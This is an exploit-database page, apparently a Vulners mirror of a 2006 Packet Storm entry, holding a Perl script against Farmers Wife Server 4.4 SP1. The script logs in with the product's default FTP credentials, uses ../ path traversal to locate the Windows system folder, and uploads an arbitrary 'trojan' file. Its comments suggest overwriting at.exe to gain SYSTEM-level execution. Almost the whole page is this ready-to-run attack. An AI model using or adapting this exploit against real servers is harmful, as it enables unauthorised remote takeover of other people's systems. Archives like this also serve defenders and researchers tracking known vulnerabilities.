Lucene search
K

DSR-farmerswife44sp1.pl.txt

🗓️ 15 Jan 2006 00:00:00Reported by Knud Erik HojgaardType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

farmers wife server 4.4 sp1 vulnerability allows unauthorized remote access by manipulating file paths and default FTP login credential

Code
`#!/usr/bin/perl  
# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to   
# use ../../../ patterns as long as we stand in a folder where we have write access.  
# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.  
# default port is 22003, default writable path is /guests.  
  
# 0day 0day, private, distribute and die bla bla bla  
# leet (translated) note from <anonymized>: you can log in as IEUser/[email protected] or anonymous/[email protected]  
# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous  
# login gives you guest access, which means write access to /guests, which means default remote 'root'  
# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.  
  
  
if(!$ARGV[0]){ die "Usage: ./thisscript.pl <ip> [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";}  
# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt  
# by default we just put /etc/hosts in a file called owned.txt in the root of the drive -   
# nuke %SYSTEMROOT%\system32\at.exe and wait for windows to run it.  
  
# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper  
# location for our trojan.  
  
use Net::FTP;  
my $target = $ARGV[0];  
my $dotdot = "../../../../../../../../../../../../../../";  
# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM  
if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";}  
if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";}  
if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";}  
if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";}  
if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";}  
if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";}  
print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n";  
  
# Open the command socket  
use Net::FTP;  
$ftp = Net::FTP->new("$target",  
Debug => 0,  
Port => "$port")  
or die "Cannot connect: $@";  
$ftp->login("$user","$pass")  
or die "Cannot login ", $ftp->message;  
$ftp->cwd("$writablepath")  
# this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.  
or die "Cannot go to writable dir ", $ftp->message;  
# leet %SYSTEMROOT% scan by determining where at.exe is using SIZE  
my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE");  
for(@systemroots){  
$reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe");  
if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; }  
}  
$ftp->binary;  
$ftp->put("$trojan","$dotdot"."$destination")  
and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message;  
$ftp->quit;  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jan 2006 00:00Current
7.4High risk
Vulners AI Score7.4
18